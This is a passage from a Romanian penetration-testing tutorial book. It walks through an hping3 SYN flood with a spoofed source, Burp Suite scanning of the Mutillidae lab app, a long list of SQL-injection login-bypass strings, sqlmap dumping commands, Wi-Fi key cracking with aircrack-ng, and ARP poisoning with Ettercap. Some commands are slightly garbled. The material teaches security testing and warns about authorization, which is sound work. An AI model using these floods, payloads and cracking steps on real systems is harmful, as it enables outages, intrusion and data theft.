inundat de solicitări și, în cele din urmă, CPU-ul PC-ului victimei sau orice alt
dispozitiv de rețea nu ar mai fi capabil să o gestioneze și
în cele din urmă s-ar închide. Un exemplu de comandă ar arăta astfel:
„hping3 –S 10.10.10.20 –a 192.168.1.20 22 –flood”
-S > Aceasta reprezintă cererea SYN.
10.10.10.20 > Acest IP reprezintă adresa IP a victimei.
-a > Aceasta înseamnă că următoarea adresă pe care o voi specifica va fi sursa
.
192.168.1.20 > Aceasta este adresa sursă falsă în loc să furnizeze propria mea
adresă, prin urmare și această adresă va fi o victimă sau o putem numi a
doua victimă, deoarece prima victimă va încerca să răspundă la solicitările SYN la
acest IP abordare.
22 > Acesta reprezintă numărul portului „ssh”, dar puteți specifica orice port care
a fost identificat ca port deschis cu instrumente precum nmap.
--flood > Aceasta înseamnă că îi spun lui Kali Linux să trimită
cererile SYN cât mai repede posibil.
Folosirea acestui set de comenzi nu este o glumă. Puteți deteriora grav
procesorul oricărui dispozitiv dacă executați o astfel de comandă chiar și pentru câteva
secunde. Dacă alegeți să-l lăsați
să funcționeze câteva minute, vă promit că multe dispozitive ar renunța și
se vor opri.
Acesta este și motivul pentru care vă avertizez să vă asigurați că aveți o
autorizație scrisă înainte de a utiliza această comandă în mediul de producție.
În plus, chiar dacă doriți să exersați în mediul de laborator de acasă,
nu-l lăsați să funcționeze mai mult de câteva secunde, deoarece poate provoca daune foarte
grave propriilor dispozitive de rețea.
Capitolul 12 Configurarea proxy Burp Suite
Proxy-ul Burp este o componentă crucială a întregii aplicații Burp Suite. Burp
proxy este un alt instrument pe care îl puteți folosi și care vă permite să interceptați
traficul web dintre browser și aplicația țintă, care este
serverul web însuși.
Pentru a porni Burp Suite, accesați meniul aplicației, apoi selectați
elementul Kali Linux, urmat de Top 10 instrumente de securitate, apoi selectați Burp Suite
din listă.
Burp Suite este versiunea gratuită din Kali în mod implicit, dar puteți folosi
și versiunea profesională și veți avea acces la toate funcționalitățile
acestei aplicații.
Versiunea gratuită este un bun punct de plecare dacă doriți să aflați cum
funcționează această aplicație. Odată ce Burp funcționează, doriți să vă
asigurați că proxy-ul este activat și ascultă pe portul 8080.
Accesați fila Proxy, selectați fila Opțiuni, apoi ar trebui să vedeți că ascultătorul proxy
rulează și ascultă pe portul 8080. În
continuare, trebuie să vă configurați browserul astfel încât să poată utiliza portul pe care ați
ascultat Burp Suite. Puteți folosi un instrument „adăugați” numit „foxy
proxy” pentru Firefox.
Este o modalitate ușoară de a avea mai mulți proxy și de a putea schimba
rapid între ele. După instalarea „foxy proxy”, chiar lângă
bara de adrese URL a browserului, există o vulpe cu un cerc și o linie peste ea. Faceți clic pe
vulpe, apoi
faceți clic pe adăugați un „proxy nou”.
În fila „Detalii proxy”, va trebui să setați configurația manuală a proxy-ului
la gazda locală și a portului proxy la 8080. Apoi, faceți clic pe
fila General, dați un nume proxy-ului și, în sfârșit, faceți clic pe butonul Salvare.
Ceea ce ați făcut în esență este să spuneți browserului dvs. să trimită tot traficul către
gazda locală la portul 8080. Acesta este portul pe care ați configurat
aplicația Burp Suite pentru a asculta.
Burp știe că va lua trafic și va trimite proxy pe internet. După ce
ați salvat acest profil, faceți clic dreapta pe vulpe și selectați
configurația dvs. proxy.
Pentru acest scenariu, îl puteți numi „Burp proxy”, iar dacă trebuie să începeți
să îl utilizați, tot ce trebuie să faceți este să dați clic pe el. Odată ce browserul dvs. utilizează
proxy-ul, puteți naviga la aplicația web. Dacă vă întoarceți la Burp,
veți vedea proxy-ul și ledul de interceptare este aprins și devine portocaliu
.
Dacă vezi că se întâmplă acest lucru, știi că ai configurat totul
perfect. Ar trebui să vedeți că Burp a capturat cu succes solicitarea de obținere pentru
site-ul web. În mod implicit, starea inițială este interceptarea întregului trafic.
Interceptare înseamnă oprirea oricărei solicitări din browser către aplicația web
și vă va oferi posibilitatea de a citi sau modifica acea solicitare. Dacă încercați să
navigați la orice site cu setările implicite, nu veți putea vedea niciun
răspuns până când nu dezactivați butonul de interceptare.
Făcând clic pe butonul de interceptare pentru a fi dezactivat, veți captura în continuare tot
traficul web, dar nu veți modifica direct fiecare solicitare. Fie
interceptarea este activată, fie dezactivată. În plus, puteți vedea toate solicitările și
răspunsurile în fila Istoric.
Capitolul 13 Configurarea țintei pentru Burp Scanner
Un mediu bun pentru testarea pătrunderii web este
site-ul mutillidae.com, care este deja instalat pe o mașină „metasploitable”. „ Metasploitable
” este un sistem de operare Linux și este preconfigurat în
scopuri de testare de penetrare.
Pentru a descărca o copie a gazdei metasploitable, trebuie să navigați pe
site-ul web al proiectului la sourceforge.net și să descărcați o copie a
mașinii virtuale făcând clic pe elementul zip Linux metasploitable.
Pentru a vedea site-ul mutillidae.com în browser, introduceți adresa IP a
mașinii dvs. metasploitable, care în cazul dvs. va fi o adresă privată.
Urmat de numele aplicației web, care este mutillidae.
Apoi, trebuie să activați proxy-ul Burp selectându-l din
meniul proxy Foxy, pe care l-ați instalat în capitolul anterior. Reveniți la Burp
proxy, faceți clic pe fila Proxy, apoi pe fila Interceptare, apoi faceți clic pe
butonul Interceptare pentru a-l dezactiva.
Nu trebuie să interceptați nicio solicitare deocamdată. Apoi, faceți clic pe
fila Țintă și asigurați-vă că fila Hartă site-ului este selectată. Ar trebui să vedeți
URL-ul mutillidae pe care tocmai l-ați prins și redirecționat.
Următorul pas pe care trebuie să-l faceți este să îl adăugați în domeniul de aplicare. Faceți clic
dreapta pe
folderul mutillidae și selectați elementul „Adăugați la domeniu”. Domeniul de aplicare
definește
unde ar putea apărea spidering și testarea automată și vă ajută să nu
scanați în mod activ domeniile care sunt în afara domeniului dvs.
Scanerele de vulnerabilitate sunt instrumente automate care accesează cu crawlere o aplicație
pentru
a identifica semnăturile vulnerabilităților cunoscute. Scanerele de vulnerabilitate sunt
zgomotoase și sunt de obicei detectate de victimă.
Însă, scanările sunt adesea ignorate ca parte a cercetării obișnuite de fundal
pe internet. Burp scanner este un scaner dinamic pentru aplicații web
inclus în adăugarea profesională a software-ului Burp Suite.
Instrumentul vă permite să scanați automat site-uri web și să detectați
defecte de securitate obișnuite, inclusiv injecția SQL, scripting încrucișat de site-uri, injectarea
XML,
marcaje cookie lipsă și multe altele.
În acest capitol, vă voi explica cum să utilizați Burp Suite pentru a realiza o
scanare completă. Încă o dată, veți folosi site-ul web mutillidae.com pentru a
vă îndeplini obiectivul. Vă rugăm să verificați capitolul anterior pentru a
înțelege elementele de bază despre utilizarea Burp Suite înainte de a continua.
După ce sunteți gata, faceți clic pe pictograma proxy Foxy pentru a activa proxy-ul Burp Suite
și selectați-vă proxy-ul din listă. Actualizați pagina și reveniți la Burp
Suite. Selectați fila Proxy, apoi fila Interceptare și dezactivați interceptarea
.
În mod implicit, scanerul Burp este configurat să efectueze scanare pasivă pe toate
domeniile, în timp ce scanarea activă este dezactivată. În fila Scanner Burp, selectați „
Scanare live” și asigurați-vă că opțiunea „Utilizați domeniul de aplicare” este selectată în
secțiunea de scanare activă în direct.
Apoi, selectați fila Țintă, apoi fila Sitemap și extindeți-vă ținta.
Apoi, este timpul să începeți să aplicați spidering, așa că treceți la fila Spider pentru
a vedea progresul spidering-ului.
Odată ce numerele nu mai cresc, înseamnă că s-a încheiat
procesul de execuție. Odată ce procesul spidering este finalizat, reveniți la
fila Sitemap, faceți clic dreapta pe țintă și selectați elementul „scanați activ această
ramură”.
Burp Suite va afișa o nouă fereastră numită „expert de scanare activ”. Acesta
este un instrument de configurare ușor pentru scanerul Burp. Primul pas în această
configurare, este acest proces care vă permite să eliminați anumite tipuri de
resurse, inclusiv imagini, JavaScript sau stiluri de foi.
În cele mai multe cazuri, configurația implicită este potrivită, așa că tot ce trebuie să faceți
este să faceți clic pe
butonul următor. În ecranul următor, instrumentul va afișa un tabel, care conține
întreaga listă de puncte finale și parametrii pe care scanerul Burp îi va include
în timpul scanării.
Este important să revizuiți cu atenție lista și să eliminați punctele finale care
fie nu sunt relevante, fie pot cauza defecțiuni. După ce ați finalizat
selecția, faceți clic pe OK pentru a începe scanarea.
Apoi, puteți monitoriza progresul bifând „fila Coadă de scanare” din
scanerul Burp. Acest tabel oferă informații despre cererile de scanare finalizate
și în cele în curs.
În mod similar, oferă o imagine de ansamblu asupra rezultatelor afișând numărul de
probleme descoperite pentru fiecare punct final. De asemenea, din acest tabel puteți elimina
elemente selectând acele resurse, apoi faceți clic dreapta și selectați elementul de ștergere.
În plus, puteți întrerupe și reporni întregul scaner din acest meniu.
Scanarea unei întregi aplicații web poate necesita câteva minute, uneori
chiar câteva ore.
Cu toate acestea, puteți analiza rezultatele în orice moment, verificând constatările
din fila Rezultate a scanerului Burp. Ca și în secțiunea Sitemap, această
vizualizare grupează vulnerabilități pe puncte finale și categorii cu o
reprezentare convenabilă.
Dacă scanerul dvs. Burp găsește vreo vulnerabilitate de scripting între site-uri,
injecție SQL sau traversare a căii fișierului, puteți face clic pe un anumit element din avizul
pentru vulnerabilitatea de securitate selectată și va fi afișat mai jos.
Afișând numele problemei pe care ați găsit-o, vi se vor
afișa și informații precum o estimare a impactului sistemului afectat
, o estimare a încrederii instrumentelor.
Acestea pot fi sigure, ferme sau tentative și vor afișa, de asemenea,
punctul final specific afectat de vulnerabilitatea de securitate.
Un meniu contextual din fereastra Rezultate permite eliminarea problemelor selectând
elementul „Șterge problemele selectate” sau atribuie un alt nivel de
severitate prin setarea nivelului de severitate și modificarea valorii de încredere.
Odată ce toate resursele au fost analizate și scanarea este finalizată, puteți
exporta rezultatele. Un scaner Burp vă permite să creați
rapoarte de bază HTML sau XML care pot fi folosite pentru a ține evidența vulnerabilităților
descoperite.
Mai mult, alte instrumente de securitate, cum ar fi metasploit, vă vor permite să importați
acele rezultate pentru a efectua sarcini suplimentare. În fila Rezultate, selectați toate
elementele
pe care doriți să le exportați.
Apoi selectați nodul rădăcină pentru a exporta toate constatările. Faceți clic dreapta pe meniul
„Selectați
contextual” și faceți clic pe elementul „Raportați problemele selectate”.
O nouă fereastră intitulată expertul „Raportare scaner Burp” vă va ghida prin
formatul raportului. Puteți utiliza selecția HTML și faceți clic pe Următorul.
În acel ecran, puteți personaliza nivelul de detalii care urmează să fie incluse în
raport. De exemplu, puteți decide să aveți un nivel maxim de detalii
bifând toate casetele de selectare și apoi faceți clic pe butonul următor.
Deoarece uneori este util să furnizați instantanee ale solicitărilor
și răspunsurilor HTTP afectate, puteți decide, de asemenea, să includeți extrase relevante în
raportul final.
Selectați caseta de selectare corespunzătoare și apoi faceți clic pe Următorul. În acest pas,
expertul pentru raportul scanerului Burp
vă permite să selectați sau să deselectați categorii de probleme de
exportat.
Luați decizia și bifați casetele de selectare corespunzătoare. Le puteți selecta
pe toate și faceți clic pe Următorul. În sfârșit, în ultimul pas, vi se cere să specificați
numele fișierului raportului.
Faceți clic pe butonul de selectare a fișierului și răsfoiți sistemul de fișiere pentru a găsi un
folder
în care doriți să salvați raportul, apoi introduceți numele fișierului, inclusiv
extensia fișierului și faceți clic pe butonul Salvare. Apoi dați un titlu raportului dvs.
În plus, puteți personaliza aspectul documentului schimbând ordinea
conținutului selectând organizarea problemei sau tabelul la
nivel de conținut. În cele din urmă, faceți clic pe butonul Următorul.
La sfârșitul expertului, o bară de progres vă va oferi un feedback cu privire la
generarea raportului. Odată finalizat, puteți face clic pe butonul Închidere.
Capitolul 14 Randomizarea jetoanelor de sesiuni Token
-urile de sesiune sunt utilizate în mod normal pentru urmărirea sesiunilor, deoarece HTTP este
implicit
un protocol fără stat. În acest capitol, ne vom uita să ne asigurăm
că jetoanele de sesiune sunt randomizate corespunzător și că nu pot fi ghicite.
În acest exemplu, puteți testa site-ul mutillidae.com, o
aplicație web vulnerabilă, care este instalată implicit pe gazda metasploitable Linux.
Puteți descărca mașina virtuală metasploitable de pe sourceforge.net.
Primul lucru pe care trebuie să-l faceți este să generați niște jetoane de sesiune. Știți
când jetoanele de sesiune sunt generate și trimise înapoi de pe
server?
Ei bine, serverul trimite un token de sesiune atunci când browserul dvs. nu trimite o
sesiune echilibrată ca cerere.
Pentru a defecta serverul web pentru prima dată, ar trebui să faceți cererea dvs. ștergând
istoricul browserului și să vă asigurați că opțiunea cookie-uri este selectată.
Apoi, utilizați Burp Suite pentru a intercepta cererea. Reîmprospătați-vă pagina și reveniți
la Burp Suite sub fila Proxy, unde ar trebui să vedeți în cererea dvs. că
simbolul de sesiune nu este prezent.
Apoi, dacă faceți clic pe butonul de redirecționare pentru a trimite cererea către server, veți
primi un răspuns cu un cookie și un nou ID de sesiune.
Faceți clic pe butonul de redirecționare pentru a trimite cererile rămase și, odată ce vedeți
un ecran alb, știți că treaba dvs. este terminată.
Faceți clic pe fila Istoric și selectați un element din listă. Ar trebui să vedeți
primul antet al cererii în secțiunea de jos, așa că faceți clic pe fila Răspuns
și faceți clic dreapta în secțiune și trimiteți-l la secvențiator.
Odată ce faceți clic pe „Trimis la secvențiere”, săriți la fila Sequencer și
identificați ce jetoane de sesiune sunt importante pentru dvs.
Odată ce ați ales jetonul, puteți face clic pe „Începe captura live” pentru a începe
să generați indicative de sesiune. Va apărea o nouă fereastră și va începe
procesarea și generarea de jetoane.
După ce ați terminat captarea live, puteți începe să analizați jetoanele de sesiune și
Burp Suite vă va oferi un rezumat al caracterului aleatoriu al jetoanelor de sesiune.
Pe lângă acest instrument, aveți și analiza nivelului corector și
analiza nivelului biților.
Există multe alte funcții în instrumentul de secvențiere al lui Burp, așa că vă recomand
să petreceți ceva timp încercând să înțelegeți cum sunt generate jetoanele de sesiune.
Toate aplicațiile web majore folosesc diferite tipuri de implementări și
algoritmi pentru a genera jetoane de sesiune.
Capitolul 15 Burp Spider-ing și injecție SQL
Când testați o aplicație web, primul lucru pe care îl puteți face este să
faceți spider gazda utilizând Burp Suite. Înseamnă că Burp va accesa cu crawlere
întregul site web și va înregistra toate fișierele diferite și metodele HTTP de pe
acel site. De ce păianjen gazda?
Ei bine, acest lucru se datorează faptului că trebuie să identificați unde sunt toate legăturile, ce
tipuri
de parametri sunt utilizați în aplicație, la ce site-uri externe face
referire aplicația și aspectul general al modului în care funcționează aplicația.
Pentru a vă conecta aplicația, trebuie să vă asigurați că fila țintă este
selectată, apoi este selectată și fila Hartă site-ului. Apoi, faceți clic dreapta pe
domeniul pe care l-ați adăugat anterior în domeniul dvs., apoi faceți clic pe elementul
numit „păianjen această ramură”.
Odată ce procesul de păianjen este complet, Burp ar trebui să aibă un aspect bun cu
exact cum arată aplicația. De asemenea, puteți face clic pe orice fișier din
lista pe care Burp o oferă pentru a vedea care a fost cererea și răspunsul.
La fel, în coloana din stânga, sub folderul „mutillidae”, puteți vedea
structura site-ului. În dreapta sus, sub fila Hartă site-ului, este
butonul de filtrare cu care puteți încerca să vă jucați pentru a vedea ce filtrezi
și ce funcționează pentru tine.
În general, este de preferat să adăugați mai întâi toate domeniile în domeniu și apoi
să faceți clic pe filtru pentru a le afișa numai pe cele care sunt în domeniu.
Uneori, paginile sau folderele nu sunt legate direct de la o aplicație web.
De exemplu, se vede adesea că folderul admin sau paginile de conectare nu sunt referite
nicăieri pe site.
Acest lucru se datorează faptului că administratorii gazdei încearcă să ascundă aceste foldere
și
pagini administrative de conectare de utilizatorii generali. Aceste tipuri de lucruri pe care le
căutați
în testul stiloului dvs., astfel încât să puteți încerca să ocoliți sau să forțați
procesul de autorizare.
Există un modul specific în Burp care este extrem de util în aceste
scenarii numit „descoperire conținut”.
Dacă deschideți browserul și introduceți adresa IP a
mașinii virtuale metasploitable, Burp Suite ar trebui să vă intercepteze cererile, prin urmare
ar trebui să o opriți.
Apoi, faceți clic pe hyperlinkul „mutillidae”. Mutillidae este o aplicație vulnerabilă
de hacking web compusă din scripturi PHP care sunt vulnerabile la primele 10
vulnerabilități ale OWASP.
Puteți începe un nou atac asupra site-ului doar vizitând pagina web a
mutillidae.com. Burp Suite ar trebui să recunoască deja existența acestuia.
Apoi, reveniți la Burp Suite și faceți clic pe „fila Țintă”, alegeți-vă domeniul, faceți
clic dreapta pe el și adăugați-l la domeniu.
După aceasta, trebuie să aplicați un păianjen, dar înainte de a face acest lucru, există
ceva de care ar trebui să fiți conștient.
Deoarece site-ul mutillidae.com are o mulțime de formulare atunci când accesați aplicația
, Burp Suite va apărea un dialog care vă va cere să introduceți acreditările
manual pentru a schimba acest comportament implicit, așa că ar trebui să faceți clic pe
„fila Păianjen”, apoi selectați „ fila Opțiuni”.
Ar trebui să vedeți că în mod implicit este selectat solicitarea de îndrumare. Schimbați-o la
ultima opțiune, deoarece puteți utiliza în schimb un „șir de injecție SQL inteligent”. În
câmpul nume de utilizator, tastați „admin”, urmat de spațiu, 1 = 1, spațiu, liniuță și
lăsați câmpul pentru parolă necompletat.
Notă: Unii oameni preferă să folosească alți utilizatori administratori pentru
ocolire a autentificării prin injecție SQL.
Faptul este că există diferite moduri prin care poți ocoli autentificarea,
prin urmare voi enumera mai jos toate variantele de parole de administrator pe care le-am
întâlnit
înainte;
„admin' --“
„admin' #“
„admin'/*“
„admin' sau „1'='1“
„admin' sau „1'='1'--“
„admin' sau '1'= „1”#“
„admin” sau „1”=“1”/*“
„admin”sau 1=1 sau „'='“
„admin” sau 1=1“
„admin” sau 1=1--“
„admin” sau 1=1#“
„admin” sau 1=1/*“
„admin”) sau (‘1’=’1“
„admin’) sau (‘1’=’1’--“ „
admin”) ') sau ('1'='1'#“
„admin') sau ('1'='1'/*“
„admin') sau '1'='1“
„admin') sau '1'= '1'--“
„admin”) sau „1'='1'#“
„admin') sau „1'='1'/*“
„admin” --“
„admin” #“
„admin”/ *“
„admin” sau „1”="1“
„admin” sau „1"="1"--“
„admin” sau „1"="1"#“
„admin” sau „1"="1 „/*“
„admin”sau 1=1 sau „”="“
„admin” sau 1=1“
„admin” sau 1=1--“
„admin” sau 1=1#“
„admin” sau 1= 1/*“
„admin”) sau („1"="1“
„admin”) sau ("1"="1"--“
„admin”) sau ("1"="1"#“ „
admin ") sau ("1"="1"/*“
„admin”) sau „1"="1“
„admin”) sau „1"="1"--“
„admin”) sau „1"= „1"#“
„admin”) sau „1"="1"/*“
Mergând mai departe, trebuie să reveniți la fila Țintă și să începeți să faceți spider aplicația
. După aceea, treceți la fila Păianjen pentru a vedea progresul spidering-ului
.
Când vezi că numerele nu mai cresc, înseamnă că s-a încheiat
procesul de execuție. Odată ce procesul de spidering este finalizat, reveniți la
fila „Sitemap”, faceți clic dreapta pe folderul Mutillidae din meniul drop-down și
selectați „Instrumente de implicare”, apoi faceți clic pe „Descoperiți conținut”.
Odată ajuns în modulul de descoperire, puteți face clic pe
butonul „Sesiunea nu rulează”, iar aplicația va porni forțarea brută inteligentă.
În acest moment, atacul cu forță brută învață din fișierele și folderele pe care le
găsește în aplicație și încearcă să facă alegeri mai bune pentru forțarea brută.
Această tehnică oferă un proces eficient de identificare a folderelor și fișierelor de
testare a aplicației. Puteți să faceți clic pe fila „Sitemap” din partea de sus a
modulului de descoperire și să vedeți toate rezultatele scanării cu forță brută.
Acest lucru va ajuta la identificarea rapidă a folderelor ascunse, a paginilor de administrare,
a paginilor de configurare și a altor pagini interesante care vă vor fi extrem de utile oricărui
tester.
Capitolul 16 Injectarea SQL cu SQLmap
Cea mai comună și exploatabilă vulnerabilitate din site-uri web este
vulnerabilitatea de injectare care apare atunci când site-ul web al victimei nu monitorizează
intrările.
Astfel, permițând atacatorului să interacționeze cu baza de date backend. Unul dintre cele
mai utile instrumente pentru evaluarea vulnerabilităților de injectare SQL se numește
SQLmap.
Este un instrument Python care automatizează recunoașterea și exploatarea
mai multor tipuri de baze de date. În acest capitol veți afla despre
atacul prin injecție SQL împotriva site-ului mutillidae.com.
Dacă utilizați metasploitable, există posibilitatea să fie necesar să îl remediați pentru
site-ul web mutillidae.com. Primul,
trebuie să vă conectați la gazda metasploitable folosind SSH.
Utilizați numele de utilizator „mfsadmin” și parola implicită, care este, de asemenea,
„mfsadmin”. Odată ce sunteți conectat la mașina metasploitable,
trebuie să deschideți fișierul de configurare al site-ului mutillidae.com.
În acest fișier, trebuie să vă asigurați că șirul de conexiune indică către
baza de date OWASP 10. Odată finalizat, puteți începe sarcina de injectare SQL.
Mai întâi, deschideți site-ul web mutillidae.com. Apoi, în meniul din stânga, selectați
OWASP 10, apoi elementul de meniu Injectare și alegeți prima
pagină de testare a injecției SQL din partea de sus.
Această pagină este vulnerabilă la injectarea SQL, așa că trebuie să interceptați cererea
trimisă de dvs. către server folosind Burp Suite. Înainte de a face clic pe „Vedeți
detaliile conturilor”, trebuie să vă asigurați că Burp Suite este activă.
Trecând înapoi la Burp Suite, ar trebui să vedeți conținutul solicitării dvs.
Apoi, trebuie să salvați conținutul într-un fișier, iar după aceea, nu
mai aveți nevoie de Burp Suite.
Puteți închide totul și deschide consola. Apoi, tastați
„sqlmap -dbs”
și apăsați Enter pentru a determina bazele de date disponibile. Cea mai probabilă bază de date
pentru a stoca datele aplicațiilor este baza de date OWASP 10, de aceea va trebui
să verificați tabelele acelei baze de date, folosind comanda:
„sqlmap --tables --database owasp –u”
și apăsați enter. Datele returnate de la executarea acestei comenzi ar trebui să
vă arate tabelele disponibile în baza de date OWASP.
Apoi, verificați tabelul de conturi și eliminați datele din acest tabel. Puteți
lista tabelele din baza de date cu următoarea comandă:
„sqlmap -u „URL” --tables -d database_name”
Puteți lista numele coloanelor dintr-un tabel cu o altă comandă:
„sqlmap -u „URL” -- coloane -d nume_bază de date -T nume_tabelă”
Puteți descărca datele utilizând comanda:
„sqlmap -u „URL” --dump -d nume_bază de date -T nume_tabelă”
Capitolul 17 Atacul dicționarului cu Airodump-ng
Pentru a executa un atac de dicționar pe un dispozitiv wireless în care rețeaua wireless
este protejată cu WPA sau WPA2, vom urma un
proces în patru pași.
În primul rând, vrem să aflăm BSSID-ul punctului de acces
împotriva căruia vrem să executăm atacul nostru din dicționar. Odată ce am găsit punctul de
acces pe care
vrem să-l atacăm, trebuie să decidem lista de cuvinte pe care vrem să o folosim pentru
atac.
O listă de cuvinte, după cum sugerează și numele, este o listă de cuvinte, ca un dicționar, și
vom încerca acea listă de cuvinte în punctul de acces.
Al treilea pas este că vom genera trafic de autentificare. Pentru ca acest
atac să funcționeze, trebuie să fim capabili să captăm un utilizator legitim care se conectează
la
punctul de acces și vom genera acel trafic, astfel încât să putem adulmeca
prin aer. În cele din urmă, trebuie să executăm atacul dicționarului.
Pentru acest atac, vom folosi Kali Linux. Pentru a face asta, trebuie să deschideți
un terminal și să vă uitați la configurație. Tastați
„iwconfig”
și ar trebui să vedeți două dintre adaptoarele LAN wireless fără fir. Wireless
wlan1 ar trebui să fie placa LAN fără fir a dispozitivului dvs., care este integrată în
dispozitivul dvs., iar wireless wlan0 este adaptorul dvs. LAN Kali Linux virtualizat dacă v-ați
conectat cu succes dispozitivele.
Acesta este și cel pe care îl veți folosi pentru a vă executa atacul. Prin urmare,
primul lucru pe care trebuie să-l faceți este să puneți placa wlan Kali Linux în
modul monitor, dar înainte de a face asta, trebuie să dezactivați
adaptorul LAN fără fir, tastând:
„ifconfig wlan0 down”
Tastați următorul:
„iwconfig wlan0 mode monitor”
Această comandă va pune adaptorul LAN fără fir în modul monitor. Dar, pentru a
vă asigura că rețeaua WLAN este sus, trebuie să tastați comanda:
„ifconfig wlan0 up”
Acum că adaptorul dvs. de lan wireless este de rezervă, doriți să confirmați că este
acum în modul monitor. Pentru a face asta, trebuie să tastați comanda:
„iwconfig”
Aici, ar trebui să vedeți unde scrie „Mode”, alături de aceasta, ar trebui să spună că cardul
este acum în modul monitor. Următorul pas este să găsiți BSSID-ul
punctului de acces pe care doriți să îl atacați. Pentru asta veți folosi instrumentul
numit Aircrack, deci trebuie să tastați:
„airodump-ng wlan0”
Aceasta va începe căutarea BSSID-urilor difuzate. Aici, veți vedea că capturați
BSSID-urile punctelor de acces din jur și canalele pe
care le folosesc.
NOTĂ: Nu compromiteți vecinii tăi wireless sau, mai rău, nu utilizați
acest instrument în mediul de producție, decât dacă aveți autorizație scrisă.
Înapoi la Kali Linux, pentru a ieși din monitorizare, puteți apăsa „Ctrl+C” pentru a opri căutarea
după ce ați găsit BSSID-ul wireless pe care îl veți
ataca.
În ieșirea lui Kali, ar trebui să aveți și adresa MAC a
BSSID-ului, care este în mod normal o literă lungă de 12 caractere și numere de care
trebuie să țineți cont, deoarece veți avea nevoie de acea adresă MAC atunci când
executați atacul. .
Următorul pas este să găsești o listă de cuvinte pe care să o poți folosi pentru a intra în
punctul de acces, iar Kali are mai multe instrumente pe care le poți folosi în acest scop.
Puteți descărca și alte instrumente similare, dar instrumentul numit „Airodump”
va face treaba. Prin urmare, trebuie să tastați:
„airodump-ng –bssid 00:11:22:33:44:55:66 –channel 1 –write wepcracking
wlan0”
NOTĂ: Acesta este doar un exemplu, dar unde am afirmat „00:11: 22:33:44:55:66”
trebuie să tastați adresa mac reală cea a BSSID-ului pe care urmează să-l
compromiteți, precum și canalul pentru dvs. ar putea fi canalul 6 sau canalul
11.
Odată ce ați executat cu succes comanda de mai sus, veți vedea că
monitorizarea rețelei wlan0 a început.
Aici, veți vedea transferul de date în coloana „date”. Nu uitați
că totul depinde de cât de complexă este parola, deoarece ar putea dura câteva
minute.
După ce ați așteptat câteva minute, ar trebui să aveți suficiente date
cu care puteți lucra, de aceea trebuie să deschideți un nou terminal și să tastați:
„ls”
Aceasta va lista fișierele pe care le-ați capturat până acum. Acum, pentru a sparge
parola, trebuie să tastați următoarea comandă:
„aircrack-ng wepcracking-01.cap”
Aici numele fișierului „wepcracking-01.cap” este un exemplu, dar trebuie să tastați
acolo orice nume de fișier ați colectat și numit sub
comanda „ls”, lângă numele fișierului „Public”.
Dacă ați folosit autentificarea WEP, până acum parola ar fi
spartă. Aircrack-ng listează în mod normal parola ca fișier ASCII spunând
„KEY FOUND”.
În cele din urmă, vă voi cere din nou să vă asigurați că aveți autorizație scrisă
pentru utilizarea Airodump-ng într-un mediu live sau de producție. Dacă exersezi doar
în laboratorul tău de acasă, într-un mediu care nu este de producție, asta
nu ar trebui să provoace probleme nimănui; totuși, aș sugera să închideți routerul și
să exersați cu grijă fără nicio conexiune la internet.
Capitolul 18 Otrăvirea ARP cu EtterCAP
Imaginați-vă că ați fost desemnat să efectuați un
atac MITM (Man in the Middle) împotriva unei anumite gazde sau server, iar alegerea
instrumentelor de utilizat
depinde de dvs.
Există mai multe moduri de a efectua un atac MITM, iar în acest capitol vom
folosi un alt instrument excelent pe care l-ați putea considera numit
EtterCAP.
EtterCAP este o altă modalitate excelentă de a aborda atacul MITM, deoarece are o
interfață grafică de utilizator sau GUI ușor de utilizat, care oferă așa-numita
metodă click, select and go.
Este întotdeauna mai bine să aveți mai multe cunoștințe despre instrumente suplimentare
dacă acestea
nu ar funcționa sau nu ar avea acces în momentul în care sunteți desemnat să faceți
testarea stiloului.
Ar trebui să știți că, pentru a obține același rezultat, există și alte
opțiuni pe care le puteți alege. EtterCAP este un alt instrument integrat pe
platforma Kali Linux. Pentru a lansa EtterCAP, puteți lansa o comandă:
„ettercap –G”
Apoi apăsați Enter. Odată ce EtterCAP este lansat, va aștepta să oferim
instrucțiuni suplimentare și mai întâi ar trebui să faceți clic pe o opțiune de meniu: Sniff > apoi
alegeți „unified sniffing”.
Apoi, ar trebui să specificați interfața de rețea pe care o veți folosi pentru adulmecare.
În cazul meu este ethernet0.
Acest lucru va crea câteva opțiuni suplimentare de meniu, așa că acum ar trebui să faceți clic
pe
opțiunea de meniu: „Gazdă”, apoi faceți clic pe „Scanați pentru gazde”.
Acest lucru nu ar trebui să dureze mai mult de 5 secunde pentru a descoperi toate gazdele
care se află în
aceeași rețea. Odată finalizat, reveniți la pictograma meniului; Gazdă > apoi faceți clic
pe listele de gazde pentru a vedea toate adresele IP ale gazdelor și adresele MAC
asociate acestora.
Odată ce aveți o listă de gazde, puteți evidenția adresa sursă și faceți clic
pe „Adăugați la ținta 1”, apoi evidențiați adresa de destinație și faceți clic pe „Adăugați
la ținta 2”.
Metoda pe care o folosim se numește OTRAVIREA ARP.
ARP înseamnă Address Resolution Protocol. Routerele, comutatoarele de nivel 3 au
intrări ARP sau tabele ARP care conțin toate adresele IP și adresele Mac asociate
sau adresele fizice care sunt conectate la rețea.
Totuși, dacă folosim ARP Poisoning, am putea falsifica adresa sursă reală spunând
destinației că avem adresa IP și adresa Mac a
nodului sursă, astfel încât tot traficul care este planificat să ajungă la gazda sursă reală, de
acum înainte . , ar veni mai întâi la noi.
În plus, tot traficul care este planificat să ajungă la gazda de destinație ar
veni și la noi, deoarece, de asemenea, am otrăvi sursa reală și i-am spune că
adresa IP de destinație și adresa Mac sunt acum mașina noastră.
Utilizarea ARP Poisoning este una dintre cele mai bune metode de a crea un
atac Man in the Middle, deoarece acum tot traficul care merge înainte și înapoi între sursă și
destinație vine de fapt prin noi.
Având tot acel trafic capturat, putem decide dacă vrem doar să-l analizăm,
altfel să-l capturam, să-l modificăm, să-l redirecționăm către o altă destinație sau pur și simplu
să oprim comunicarea dintre acele dispozitive.
Prin urmare, ultima piesă pentru a lansa un astfel de atac este să faceți clic pe
pictograma de meniu numită „MITM” și apoi să selectați „Otrăvire ARP”. Odată ce ați terminat
și doriți să opriți otrăvirea ARP, faceți clic pe „Opriți atacurile MITM”.
În cele din urmă, vă voi cere din nou să vă asigurați că aveți autorizație scrisă
pentru utilizarea acestei metode într-un mediu live sau de producție, deoarece orice tip de
atac Man in the Middle este foarte periculos, mai ales când manipulați
traficul direcționat prin otrăvirea tabelelor ARP. prin alimentarea cu
adrese Mac false.
Dacă exersezi doar în laboratorul tău de acasă, într-un mediu care nu este de producție,
asta nu ar trebui să provoace probleme nimănui; totuși, aș sugera să închideți
routerul și să exersați cu grijă fără nicio conexiune la internet.
